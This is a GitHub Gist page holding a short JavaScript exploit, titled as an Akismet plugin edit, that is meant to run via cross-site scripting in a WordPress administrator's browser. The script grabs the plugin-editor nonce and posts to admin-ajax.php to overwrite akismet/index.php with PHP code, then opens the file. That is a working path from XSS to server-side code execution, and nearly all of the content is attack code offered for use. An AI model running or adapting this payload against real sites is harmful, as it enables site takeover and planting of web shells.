Skip to content

Instantly share code, notes, and snippets.

@allyshka

allyshka/akismet-xss-edit.js

Created April 10, 2019 23:58
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save allyshka/2df2f88170704c611294b6ec914a6ffb to your computer and use it in GitHub Desktop.
Save allyshka/2df2f88170704c611294b6ec914a6ffb to your computer and use it in GitHub Desktop.
Download ZIP
Wordpress Akismet plugin index.php edit
Raw
akismet-xss-edit.js
var exploit = function() {
var nonce = '';
var phpcode = '<?php phpinfo();/*';
var pluginurl = '/wp-admin/plugin-editor.php?plugin=akismet/index.php&Submit=Select';
var pluginupdateurl = '/wp-admin/admin-ajax.php';
var file = "akismet/index.php";
var plugin = "akismet/akismet.php";
console.log("Get nonce token.");
jQuery.get(pluginurl, function(data) {
nonce = jQuery(data).find('#template #nonce').val();
if(nonce) {
console.log("Success! nonce: " + nonce);
var postdata = {
"nonce": nonce,
"newcontent": phpcode,
"action": "edit-theme-plugin-file",
"file": file,
"plugin": plugin,
"docs-list": ""
}
console.log("Add PHP code to plugin file.");
jQuery.post(pluginupdateurl, postdata, function(data){
console.log("Success!");
window.open("/wp-content/plugins/akismet/");
});
}
});
}
var h=document.getElementsByTagName('head')[0];
var j=document.createElement('script');
j.onload = exploit;
j.src='/wp-admin/load-scripts.php?load=jquery-core';
h.appendChild(j);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment